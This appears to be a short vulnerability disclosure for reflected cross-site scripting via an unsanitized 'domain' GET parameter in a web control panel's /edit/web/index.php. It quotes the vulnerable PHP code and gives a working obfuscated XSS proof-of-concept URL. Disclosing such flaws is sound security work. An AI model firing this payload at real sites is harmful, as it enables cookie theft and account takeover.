The user-controlled GET domain parameter in index.php is unsanitized resulting in Reflected Cross-Site Scripting.
GET https://{HOST}/edit/web/
// File: /web/edit/web/index.php#L28
// List domain
$v_domain = $_GET['domain']; // User controllable parameter
if ($_SESSION['userContext'] !== 'admin') {
if (!in_array($v_domain, $user_domains)) {
header("Location: /list/mail/");
exit;
}
}
GET https://{HOST}/edit/web/?domain=<htmL/+/OnpOintEReNTEr%0d=%0d["XSS-HERE"].find(confirm)//
&token=01de3634f2469d87dab9b338eaff4863
This vulnerability is capable of running malicious Javascript code on web pages, stealing a user’s cookie and gaining unauthorized access to that user’s account through the stolen cookie.